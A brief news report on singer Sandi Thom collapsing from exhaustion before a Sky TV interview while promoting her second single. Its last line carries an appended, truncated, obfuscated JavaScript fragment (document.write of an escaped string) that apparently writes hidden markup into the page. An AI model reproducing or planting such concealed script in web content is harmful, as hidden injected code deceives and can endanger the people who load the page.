Scottish singer Sandi Thom collapsed with exhaustion minutes before she was due to appear on TV.
The chart-topping artist was just about to record an interview with Sky TV when she fell ill.
The star - who had a No 1 hit with I Wish I Was A Punk Rocker - has now been ordered to rest for a few days.
"Sandi has been working so hard to break America and the UK that her body literally couldn't take any more punishment," her spokesman said.
"The doctor has insisted she take a few days off at home with her guitar to recover. She will be fine after that, though."
The 25-year-old was promoting her second single What If I'm Right?
Sandi has had a busy schedule this summer.
She had just returned from a 12-date US tour when she appeared at the V Festival in Chelmsford and Staffordshire last week.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
